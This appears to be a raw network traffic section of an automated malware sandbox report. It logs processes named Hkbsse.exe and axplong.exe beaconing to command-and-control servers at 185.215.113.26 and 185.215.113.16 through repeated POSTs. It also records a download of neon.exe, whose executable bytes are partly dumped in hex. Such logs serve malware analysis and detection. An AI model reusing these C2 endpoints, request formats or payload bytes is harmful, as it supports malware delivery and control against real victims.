                                                                          Sep 27, 2024 04:21:42.150885105 CEST1236INData Raw: 87 3a 4e 9a 1a e1 c6 91 9f 4b 76 98 ba 86 2e d1 83 75 de e8 fa e4 63 8f 91 50 24 4e c9 0a 26 f2 ea 63 1c 5a 53 6c ba 98 a1 aa 7b 31 8c 84 30 1c ea e3 07 c6 1e b8 52 77 02 b1 3d 1d 8a 63 79 08 bf 7b b9 aa c0 5a 30 db 55 5a 75 76 55 a3 ed 74 6f 3d
                                                                          Data Ascii: :NKv.ucP$N&cZSl{10Rw=cy{Z0UZuvUto=Y{1Q.X3:`ppu8;wl[6vPZ^F` +|iNa:NO3!_G~8Iq>kQo;*a&=vrkspyb|0z
                                                                          Sep 27, 2024 04:21:42.150896072 CEST1236INData Raw: 1e 47 b8 ea 16 d8 62 dc 83 aa c3 eb 1e 45 49 aa 16 9b a6 15 08 d9 22 cb 79 0c cf a8 99 4d 69 d5 7a 58 79 9b 5a 44 3f 74 f1 e0 3a 91 a4 69 9c 8e 6a a3 c1 bd c6 05 7b d4 8a 8a e4 3d 8e ea 39 05 0f 9a 08 48 53 5f b5 a6 93 6a b7 42 0b 60 cf cb f4 e5
                                                                          Data Ascii: GbEI"yMizXyZD?t:ij{=9HS_jB``T+E%+?(Fk&hLQR\,20O0%+8)/3^]{_0L[0@@gA:+pI(YM0P
                                                                          Sep 27, 2024 04:21:42.150906086 CEST1236INData Raw: ef 25 7e 1a 49 4d 02 2b b6 e0 73 f9 f5 f3 07 fb 0d d6 33 fe bb 4d 1e 88 c7 1f 4c 4d 88 2f f2 92 d3 b5 99 dd 7e c8 79 b3 de 57 d2 de 7d ad e2 8f dc 04 be 91 40 f4 89 10 53 b3 80 1c f3 c8 dd db 26 ac 14 bb 55 9e 51 f2 f5 e6 7e d0 01 15 f8 95 7f c2
                                                                          Data Ascii: %~IM+s3MLM/~yW}@S&UQ~xH];Z]:h<WR^)A_:Y$c(l${Et93RV}/[(DjmJK]@'
                                                                          Sep 27, 2024 04:21:42.155750036 CEST1236INData Raw: fc 98 38 28 86 60 c0 63 31 17 f8 92 ab 46 b2 cb 09 10 a4 ce cf 08 b7 51 17 6a dd b4 16 aa 3e b8 35 27 98 4c 5b 61 13 eb 38 62 cb 94 e3 d4 4d d6 14 ea a5 da 6f da a6 aa c1 34 85 f1 88 64 ae 2f 96 ab b4 48 31 5a 78 0b ac 50 ad f0 b9 9a a4 cd 24 ba
                                                                          Data Ascii: 8(`c1FQj>5'L[a8bMo4d/H1ZxP$X0VEHi]G&.^"TapX)[0o1u`\b3"?]uB0U45=BbJJbAJr6VPDcB>S_h`y


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          44192.168.2.549769185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:42.142299891 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:42.854861975 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:42 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:42.857419968 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:43.094243050 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:42 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.2.549771185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:43.308554888 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:44.009838104 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:43 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:44.011286974 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:44.239038944 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:44 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.2.549773185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:44.361176968 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:45.090244055 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:44 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:45.094036102 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:45.324085951 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.2.549774185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:44.704541922 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 33 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000355001&unit=246122658369
                                                                          Sep 27, 2024 04:21:45.407063007 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0
                                                                          Sep 27, 2024 04:21:45.812777996 CEST52OUTGET /inc/neon.exe HTTP/1.1
                                                                          Host: 185.215.113.16
                                                                          Sep 27, 2024 04:21:46.036129951 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:45 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 3643904
                                                                          Last-Modified: Thu, 26 Sep 2024 19:28:15 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f5b5cf-379a00"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 80 02 85 16 00 00 00 00 00 00 00 00 f0 00 02 01 0b 02 08 00 00 5c 23 00 00 3c 14 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 23 00 ac 3a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd\#< @ 7`@@ #: H.text[# \# `.rsrc:#<^#@@HX"TN-"~PtfL^[1wuBZF!-(E!l|IIf9HOO_9XBCRn|kh^rly~`ZB(e_pFjgZ4phHy7P6Q)92y:nFbzW\cl]1w-(6i( Urg@N=q]'d plW!r_Dxq_-<FsQ#ixL+,b"W6h\d0`\>1wlRln(}*hc}
                                                                          Sep 27, 2024 04:21:46.036263943 CEST1236INData Raw: 3a dd f7 d6 61 0f fd cb c7 62 a2 12 39 49 85 2c 06 ef 2e 1d 91 f2 c8 50 d2 cd 82 73 7a 6f 87 7c 6a ed 34 4a 85 52 af dd bd 03 9f 8e 4a aa ae 19 22 e7 ba fe bf c9 eb 46 15 a6 04 92 8c 8a 50 58 da 26 a6 4a 14 3b a6 b2 3f 50 5e 8d 53 39 05 28 1f 68
                                                                          Data Ascii: :ab9I,.Pszo|j4JRJ"FPX&J;?P^S9(hP4NQ2G$cAoj]s#9RhI%c"+$cjPL5X<r-_sZ_IILg<vf{KUs,j>P[8-9X$uH4$XM9(w
                                                                          Sep 27, 2024 04:21:46.036284924 CEST1236INData Raw: 00 00 01 a2 14 14 16 17 28 4b 00 00 0a 00 2a 1e 02 28 37 00 00 0a 2a 76 00 72 da 0a 00 70 28 85 00 00 0a 8c 14 00 00 01 03 28 86 00 00 0a 28 87 00 00 0a 00 2a 4e 02 28 37 00 00 0a 00 02 73 88 00 00 0a 7d 27 00 00 04 2a ee 00 02 03 7d 24 00 00 04
                                                                          Data Ascii: (K*(7*vrp(((*N(7s}'*}$}%}&}({(rp{$(oO*.sa**&{-+*"}-*&{.+*"}.*&{/+*"}/*(7(f(h(j*&{0
                                                                          Sep 27, 2024 04:21:46.036304951 CEST1236INData Raw: 03 2c 0c 02 03 7b 8c 00 00 04 7d 8c 00 00 04 2a 62 02 28 37 00 00 0a 00 02 73 37 00 00 0a 28 38 00 00 0a 7d 8e 00 00 04 2a 82 00 02 03 28 38 00 00 0a 20 f7 00 00 00 20 d3 00 00 00 1f 3b 28 0b 01 00 0a 28 4e 01 00 06 00 2a 26 02 7b c6 00 00 04 2b
                                                                          Data Ascii: ,{}*b(7s7(8}*(8 ;((N*&{+*6(8}*N(7s}*&{+*6(8}*6(T(*sV}(W sX(Yr,poZ*0O @%m(
                                                                          Sep 27, 2024 04:21:46.036317110 CEST1236INData Raw: 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 4d 00 00 0a 00 02 28 34 00 00 06 14 72 03 01 00 70 16 8d 06 00 00 01 14 14 14 28 48 00 00 0a 14 72 2d 01 00 70 17 8d 06 00 00 01 25 16 17 8c 55 00 00 01 a2 14 14 16 17 28 4b 00 00 0a 00
                                                                          Data Ascii: oIoJoLoM(4rp(Hr-p%U(K}{oN(4r?p%V(O&}*0{(ErWp(FoG&{**,(={oIoJoLoPo
                                                                          Sep 27, 2024 04:21:46.036329985 CEST1236INData Raw: 0c 72 60 07 00 70 13 0d 12 29 15 28 5e 00 00 0a 38 46 01 00 00 00 02 7b 0c 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 27 1f 33 d6 6f 51 00 00 0a 28 52 00 00 0a 13 0b 11 0b 72 60 07 00 70 16 28 5f 00 00 0a 16 fe
                                                                          Data Ascii: r`p)(^8F{oIoJoLoP'3oQ(Rr`p(_rdp(_`rfp(_`33,r`pr`p)(^8r`p$o`%%oa%ob%oa)(^4{oIoJoLoP
                                                                          Sep 27, 2024 04:21:46.036341906 CEST1236INData Raw: 0a 00 00 1b 11 3b 2b 0f 12 3a 28 65 00 00 0a 16 fe 01 73 66 00 00 0a 13 3b 12 3b 28 67 00 00 0a 13 43 11 43 39 c5 00 00 00 02 7b 0d 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 68 00 00 0a 13 44 02 7b 0d 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a
                                                                          Data Ascii: ;+:(esf;;(gCC9{oIoJohD{oIoJoLD{oIoJoLoiojD'VokD)okDokDokDVokDVokDrdpokDrdpok
                                                                          Sep 27, 2024 04:21:46.036354065 CEST1236INData Raw: 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 30 6f 51 00 00 0a 16 28 63 00 00 0a 13 32 11 32 2c 0b 12 28 11 27 28 5e 00 00 0a 2b 12 00 00 00 11 30 17 d6 13 30 11 30 1f 63 3e 7c ff ff ff 00 02 7b 0c 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00
                                                                          Data Ascii: oJoLoP0oQ(c22,('(^+000c>|{oIoJoLoP'oQ(8(]33,r`pr`p)(^8E{oIoJoLoP'oQ(Rr`p(_rdp(_`rfp(_`4
                                                                          Sep 27, 2024 04:21:46.036369085 CEST1236INData Raw: 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 27 18 d6 6f 51 00 00 0a 28 38 00 00 0a 28 5d 00 00 0a 16 fe 01 13 42 11 42 39 3c 01 00 00 02 7b 0c 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 27 18 d6 6f 51 00
                                                                          Data Ascii: oJoLoP'oQ(8(]BB9<{oIoJoLoP'oQr`p(lCC9);;(d-<<+;(esf<<(gDD9{oIoJohE{oIoJoLE{oIoJoLoioj
                                                                          Sep 27, 2024 04:21:46.036380053 CEST1236INData Raw: 11 04 20 96 00 00 00 6f 73 00 00 0a 00 06 6f 74 00 00 0a 11 04 6f 75 00 00 0a 26 73 70 00 00 0a 13 09 11 09 72 76 08 00 70 6f 71 00 00 0a 00 11 09 72 80 08 00 70 6f 72 00 00 0a 00 11 09 20 96 00 00 00 6f 73 00 00 0a 00 06 6f 74 00 00 0a 11 09 6f
                                                                          Data Ascii: osotou&sprvpoqrpor osotou&{rp(Hr$p%%U%%(O&-+(8b(*(vtb*0e{(ErWp(FoG&{oI
                                                                          Sep 27, 2024 04:21:46.036936998 CEST1236INData Raw: 2b 50 00 08 17 d6 0c 17 0b 02 7b 1b 00 00 04 14 72 02 07 00 70 17 8d 06 00 00 01 25 16 12 01 28 56 00 00 0a a2 14 14 28 5c 00 00 0a 00 02 7b 1c 00 00 04 14 72 02 07 00 70 17 8d 06 00 00 01 25 16 12 02 28 56 00 00 0a a2 14 14 28 5c 00 00 0a 00 00
                                                                          Data Ascii: +P{rp%(V(\{rp%(V(\oZsxoyrp{rp(H(zrp(z{rp(H(zr$p(z(Ro{o|(w}{oI


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.2.549776185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:45.859035015 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:46.571154118 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:46.574659109 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:46.811865091 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.549778185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:46.961760044 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:47.718556881 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:47 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:47.719949961 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:47.960158110 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:47 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.549781185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:48.382457018 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:49.098851919 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:48 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:49.100006104 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:49.331341028 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.549784185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:49.454050064 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:50.160211086 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:50.167229891 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
